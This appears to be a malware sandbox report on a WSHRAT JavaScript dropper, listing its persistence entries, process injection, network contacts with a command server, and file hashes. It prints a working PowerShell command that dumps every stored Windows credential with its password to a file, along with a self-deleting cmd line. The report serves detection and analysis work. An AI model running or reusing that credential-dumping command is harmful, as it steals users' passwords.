Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Scan0035 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\Scan0035.js\"" C:\Windows\system32\wscript.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1440 set thread context of 3028 N/A C:\Users\Admin\AppData\Roaming\bin.exe C:\Windows\Explorer.EXE
PID 3652 set thread context of 3028 N/A C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\Explorer.EXE

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.edb C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.jfm C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\ReportingEvents.log C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\Logs\CBS\CBS.log C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
File opened for modification C:\Windows\WinSxS\pending.xml C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
File opened for modification C:\Windows\WindowsUpdate.log C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk C:\Windows\system32\svchost.exe N/A

Enumerates physical storage devices

Gathers network information

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\NETSTAT.EXE N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A

Script User-Agent

Description Indicator Process Target
HTTP User-Agent header WSHRAT|5C0A896F|JDQPXOPR|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 16/2/2022|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|5C0A896F|JDQPXOPR|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 16/2/2022|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|5C0A896F|JDQPXOPR|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 16/2/2022|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|5C0A896F|JDQPXOPR|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 16/2/2022|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header WSHRAT|5C0A896F|JDQPXOPR|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 16/2/2022|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|5C0A896F|JDQPXOPR|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 16/2/2022|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|5C0A896F|JDQPXOPR|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 16/2/2022|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|5C0A896F|JDQPXOPR|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 16/2/2022|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|5C0A896F|JDQPXOPR|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 16/2/2022|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|5C0A896F|JDQPXOPR|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 16/2/2022|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|5C0A896F|JDQPXOPR|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 16/2/2022|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header WSHRAT|5C0A896F|JDQPXOPR|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 16/2/2022|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|5C0A896F|JDQPXOPR|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 16/2/2022|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|5C0A896F|JDQPXOPR|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 16/2/2022|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|5C0A896F|JDQPXOPR|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 16/2/2022|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|5C0A896F|JDQPXOPR|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 16/2/2022|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|5C0A896F|JDQPXOPR|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 16/2/2022|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|5C0A896F|JDQPXOPR|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 16/2/2022|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|5C0A896F|JDQPXOPR|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 16/2/2022|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|5C0A896F|JDQPXOPR|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 16/2/2022|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|5C0A896F|JDQPXOPR|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 16/2/2022|JavaScript-v3.4|NL:Netherlands N/A N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bin.exe N/A
N/A N/A C:\Windows\SysWOW64\NETSTAT.EXE N/A
N/A N/A C:\Windows\SysWOW64\NETSTAT.EXE N/A
N/A N/A C:\Windows\SysWOW64\NETSTAT.EXE N/A
N/A N/A C:\Windows\SysWOW64\NETSTAT.EXE N/A
N/A N/A C:\Windows\SysWOW64\NETSTAT.EXE N/A
N/A N/A C:\Windows\SysWOW64\NETSTAT.EXE N/A
N/A N/A C:\Windows\SysWOW64\NETSTAT.EXE N/A
N/A N/A C:\Windows\SysWOW64\NETSTAT.EXE N/A
N/A N/A C:\Windows\SysWOW64\NETSTAT.EXE N/A
N/A N/A C:\Windows\SysWOW64\NETSTAT.EXE N/A
N/A N/A C:\Windows\SysWOW64\NETSTAT.EXE N/A
N/A N/A C:\Windows\SysWOW64\NETSTAT.EXE N/A
N/A N/A C:\Windows\SysWOW64\NETSTAT.EXE N/A
N/A N/A C:\Windows\SysWOW64\NETSTAT.EXE N/A
N/A N/A C:\Windows\SysWOW64\NETSTAT.EXE N/A
N/A N/A C:\Windows\SysWOW64\NETSTAT.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\NETSTAT.EXE N/A
N/A N/A C:\Windows\SysWOW64\NETSTAT.EXE N/A
N/A N/A C:\Windows\SysWOW64\NETSTAT.EXE N/A
N/A N/A C:\Windows\SysWOW64\NETSTAT.EXE N/A
N/A N/A C:\Windows\SysWOW64\NETSTAT.EXE N/A
N/A N/A C:\Windows\SysWOW64\NETSTAT.EXE N/A
N/A N/A C:\Windows\SysWOW64\NETSTAT.EXE N/A
N/A N/A C:\Windows\SysWOW64\NETSTAT.EXE N/A
N/A N/A C:\Windows\SysWOW64\NETSTAT.EXE N/A
N/A N/A C:\Windows\SysWOW64\NETSTAT.EXE N/A
N/A N/A C:\Windows\SysWOW64\NETSTAT.EXE N/A
N/A N/A C:\Windows\SysWOW64\NETSTAT.EXE N/A
N/A N/A C:\Windows\SysWOW64\NETSTAT.EXE N/A
N/A N/A C:\Windows\SysWOW64\NETSTAT.EXE N/A
N/A N/A C:\Windows\SysWOW64\NETSTAT.EXE N/A
N/A N/A C:\Windows\SysWOW64\NETSTAT.EXE N/A
N/A N/A C:\Windows\SysWOW64\NETSTAT.EXE N/A
N/A N/A C:\Windows\SysWOW64\NETSTAT.EXE N/A
N/A N/A C:\Windows\SysWOW64\NETSTAT.EXE N/A
N/A N/A C:\Windows\SysWOW64\NETSTAT.EXE N/A
N/A N/A C:\Windows\SysWOW64\NETSTAT.EXE N/A
N/A N/A C:\Windows\SysWOW64\NETSTAT.EXE N/A
N/A N/A C:\Windows\SysWOW64\NETSTAT.EXE N/A
N/A N/A C:\Windows\SysWOW64\NETSTAT.EXE N/A
N/A N/A C:\Windows\SysWOW64\NETSTAT.EXE N/A
N/A N/A C:\Windows\SysWOW64\NETSTAT.EXE N/A
N/A N/A C:\Windows\SysWOW64\NETSTAT.EXE N/A
N/A N/A C:\Windows\SysWOW64\NETSTAT.EXE N/A
N/A N/A C:\Windows\SysWOW64\NETSTAT.EXE N/A
N/A N/A C:\Windows\SysWOW64\NETSTAT.EXE N/A
N/A N/A C:\Windows\SysWOW64\NETSTAT.EXE N/A
N/A N/A C:\Windows\SysWOW64\NETSTAT.EXE N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bin.exe N/A
N/A N/A C:\Windows\SysWOW64\NETSTAT.EXE N/A
N/A N/A C:\Windows\SysWOW64\NETSTAT.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\bin.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\NETSTAT.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeSecurityPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeBackupPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1536 wrote to memory of 680 N/A C:\Windows\system32\wscript.exe C:\Windows\System32\wscript.exe
PID 1536 wrote to memory of 680 N/A C:\Windows\system32\wscript.exe C:\Windows\System32\wscript.exe
PID 680 wrote to memory of 1440 N/A C:\Windows\System32\wscript.exe C:\Users\Admin\AppData\Roaming\bin.exe
PID 680 wrote to memory of 1440 N/A C:\Windows\System32\wscript.exe C:\Users\Admin\AppData\Roaming\bin.exe
PID 680 wrote to memory of 1440 N/A C:\Windows\System32\wscript.exe C:\Users\Admin\AppData\Roaming\bin.exe
PID 3028 wrote to memory of 3652 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\NETSTAT.EXE
PID 3028 wrote to memory of 3652 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\NETSTAT.EXE
PID 3028 wrote to memory of 3652 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\NETSTAT.EXE
PID 3652 wrote to memory of 3544 N/A C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\cmd.exe
PID 3652 wrote to memory of 3544 N/A C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\cmd.exe
PID 3652 wrote to memory of 3544 N/A C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\cmd.exe
PID 680 wrote to memory of 3740 N/A C:\Windows\System32\wscript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 680 wrote to memory of 3740 N/A C:\Windows\System32\wscript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 680 wrote to memory of 216 N/A C:\Windows\System32\wscript.exe C:\Windows\system32\cmd.exe
PID 680 wrote to memory of 216 N/A C:\Windows\System32\wscript.exe C:\Windows\system32\cmd.exe
PID 216 wrote to memory of 900 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 216 wrote to memory of 900 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Local\Temp\Scan0035.js

C:\Windows\System32\wscript.exe

"C:\Windows\System32\wscript.exe" //B "C:\Users\Admin\AppData\Roaming\Scan0035.js"

C:\Users\Admin\AppData\Roaming\bin.exe

"C:\Users\Admin\AppData\Roaming\bin.exe"

C:\Windows\SysWOW64\NETSTAT.EXE

"C:\Windows\SysWOW64\NETSTAT.EXE"

C:\Windows\SysWOW64\cmd.exe

/c del "C:\Users\Admin\AppData\Roaming\bin.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -command [void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime] $vault = New-Object Windows.Security.Credentials.PasswordVault $vault.RetrieveAll() | % { $_.RetrievePassword();$_ } > "C:\Users\Admin\AppData\Local\Temp\tmp.txt"

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM cmdc.exe

Network

Country Destination Domain Proto
US 209.197.3.8:80 tcp
US 162.0.215.15:443 tcp
US 20.42.72.131:443 tcp
US 34.104.35.123:80 tcp
NL 88.221.144.170:80 tcp
NL 88.221.144.170:80 tcp
US 8.8.8.8:53 astatech-cn.com udp
GB 78.110.166.82:80 astatech-cn.com tcp
NL 142.250.179.173:443 tcp
NL 142.250.179.206:443 tcp
NL 142.251.36.3:443 tcp
GB 78.110.166.82:80 astatech-cn.com tcp
US 8.8.8.8:443 tcp
NL 142.250.179.131:443 tcp
NL 172.217.168.193:443 tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 154.127.53.102:7121 154.127.53.102 tcp
NL 142.250.179.138:443 tcp
US 154.127.53.102:7121 154.127.53.102 tcp
US 154.127.53.102:7121 154.127.53.102 tcp
US 154.127.53.102:7121 154.127.53.102 tcp
US 8.8.8.8:53 wshsoft.company udp
SG 194.59.164.67:80 wshsoft.company tcp
US 154.127.53.102:7121 154.127.53.102 tcp
US 154.127.53.102:7121 154.127.53.102 tcp
US 154.127.53.102:7121 154.127.53.102 tcp
US 154.127.53.102:7121 154.127.53.102 tcp
US 8.8.8.8:53 www.qube.site udp
DE 52.58.78.16:80 www.qube.site tcp
US 154.127.53.102:7121 154.127.53.102 tcp
US 8.8.8.8:443 tcp
NL 142.251.36.3:443 tcp
US 8.8.8.8:53 www.solutionsoutlet.net udp
CA 23.227.38.74:80 www.solutionsoutlet.net tcp
US 154.127.53.102:7121 154.127.53.102 tcp
US 154.127.53.102:7121 154.127.53.102 tcp
US 154.127.53.102:7121 154.127.53.102 tcp
US 154.127.53.102:7121 154.127.53.102 tcp
US 154.127.53.102:7121 154.127.53.102 tcp
US 8.8.8.8:53 www.cafedetime.com udp
US 156.67.73.64:80 www.cafedetime.com tcp
US 154.127.53.102:7121 154.127.53.102 tcp
NL 142.250.179.195:443 tcp
US 154.127.53.102:7121 154.127.53.102 tcp
US 154.127.53.102:7121 154.127.53.102 tcp
US 154.127.53.102:7121 154.127.53.102 tcp
US 8.8.8.8:53 www.soy-salud.com udp
US 34.102.136.180:80 www.soy-salud.com tcp
US 154.127.53.102:7121 154.127.53.102 tcp
US 154.127.53.102:7121 154.127.53.102 tcp
US 154.127.53.102:7121 154.127.53.102 tcp
US 8.8.8.8:53 www.ecoracing.tech udp
US 199.59.243.200:80 www.ecoracing.tech tcp

Files

C:\Users\Admin\AppData\Roaming\Scan0035.js

MD5 ad65c8c29d312119ad339adc8b699025
SHA1 4c04e6c3a2d0ecd059265fba70356277723dd12b
SHA256 9721db64a4674e5b1a6285114ffa9894f34a638dc827a2ca2972c91cc54f63d9
SHA512 0d967d7beb9c8fa8ff806678fcdd241ea0600bcd4a7399fa640d49d823036dc00b59697dffc801aa4369c12760c79e4e8ed6ae141e9e26371dc2608cbdfa709d

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Scan0035.js

MD5 ad65c8c29d312119ad339adc8b699025
SHA1 4c04e6c3a2d0ecd059265fba70356277723dd12b
SHA256 9721db64a4674e5b1a6285114ffa9894f34a638dc827a2ca2972c91cc54f63d9
SHA512 0d967d7beb9c8fa8ff806678fcdd241ea0600bcd4a7399fa640d49d823036dc00b59697dffc801aa4369c12760c79e4e8ed6ae141e9e26371dc2608cbdfa709d

C:\Users\Admin\AppData\Roaming\bin.exe

MD5 61a9ea670e5ace0c0b4713de4a5ee617
SHA1 1f74d817f245c136ea1960be91da994414d7d50d
SHA256 9111d77c08078d5af636aa2e765bce0891704acdd1fd0a325605e0aaf42d4d97
SHA512 88348c23255de8214fe636ec0c0d97be12f36c5ec5437ea8096b171d86b3b8a5b0f1cc56798f568b01345584bc3c49f6b42d75b75694ec601484b2e10941ad7b

C:\Users\Admin\AppData\Roaming\bin.exe

MD5 61a9ea670e5ace0c0b4713de4a5ee617
SHA1 1f74d817f245c136ea1960be91da994414d7d50d
SHA256 9111d77c08078d5af636aa2e765bce0891704acdd1fd0a325605e0aaf42d4d97
SHA512 88348c23255de8214fe636ec0c0d97be12f36c5ec5437ea8096b171d86b3b8a5b0f1cc56798f568b01345584bc3c49f6b42d75b75694ec601484b2e10941ad7b

memory/1440-134-0x00000000011D0000-0x000000000151A000-memory.dmp

memory/1440-135-0x00000000005DF000-0x00000000005E0000-memory.dmp

memory/1440-136-0x0000000000CE0000-0x0000000000CF4000-memory.dmp

memory/3028-137-0x00000000080B0000-0x00000000081E0000-memory.dmp

memory/3652-138-0x00000000009C0000-0x00000000009CB000-memory.dmp

memory/3652-139-0x0000000001110000-0x000000000145A000-memory.dmp

memory/3652-140-0x0000000000700000-0x000000000072F000-memory.dmp

memory/3028-142-0x00000000081E0000-0x0000000008307000-memory.dmp

memory/3652-141-0x0000000000CF0000-0x0000000000D83000-memory.dmp

memory/4984-143-0x000001551E580000-0x000001551E590000-memory.dmp

memory/4984-144-0x000001551EC20000-0x000001551EC30000-memory.dmp

memory/4984-145-0x0000015521300000-0x0000015521304000-memory.dmp

memory/3740-146-0x00007FFBF5743000-0x00007FFBF5745000-memory.dmp

memory/3740-147-0x0000025B3DEE0000-0x0000025B3DEE2000-memory.dmp

memory/3740-148-0x0000025B3DEE3000-0x0000025B3DEE5000-memory.dmp

memory/3740-149-0x0000025B3DEA0000-0x0000025B3DEC2000-memory.dmp

memory/3740-150-0x0000025B3DED0000-0x0000025B3DEDA000-memory.dmp

memory/3740-151-0x0000025B3DEE6000-0x0000025B3DEE8000-memory.dmp

memory/3740-152-0x0000025B3E1F0000-0x0000025B3E1F8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmp.txt

MD5 c416c12d1b2b1da8c8655e393b544362
SHA1 fb1a43cd8e1c556c2d25f361f42a21293c29e447
SHA256 0600d59103840dff210778179fdfba904dcb737a4bfdb35384608698c86ea046
SHA512 cb6d3636be4330aa2fd577c3636d0b7165f92ee817e98f21180ba0c918eb76f4e38f025086593a0e508234ca981cfec2c53482b0e9cc0acfa885fefbdf89913c